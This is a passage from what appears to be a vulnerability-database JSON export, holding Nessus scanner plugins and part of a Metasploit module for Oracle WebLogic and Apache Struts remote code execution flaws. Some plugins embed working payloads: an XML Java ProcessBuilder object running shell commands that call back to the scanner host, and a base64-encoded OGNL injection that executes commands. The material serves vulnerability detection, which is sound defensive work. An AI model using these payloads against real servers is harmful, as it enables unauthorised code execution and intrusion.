=> 'text/xml',\n 'data' => soap_payload,\n 'headers' => { 'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, 'No response from host')\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply, \"Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:22:37", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:22", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:10", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T15:36:20", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-05-31T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:11:11", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the WLS9-async component due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {}, "published": "2019-04-26T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_CVE-2019-2725.NASL", "href": "https://www.tenable.com/plugins/nessus/124337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124337);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-2725\");\n script_bugtraq_id(108074);\n script_xref(name:\"IAVA\", value:\"2019-A-0128\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0242\");\n\n script_name(english:\"Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host\nis affected by a remote code execution vulnerability in the WLS9-async component\ndue to unsafe deserialization of XML encoded Java objects. An unauthenticated, \nremote attacker can exploit this, via a crafted Java object, to execute \narbitrary Java code in the context of the WebLogic server.\");\n # https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?95b9a80b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the Oracle Security Alert\nAdvisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\nwindows\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", 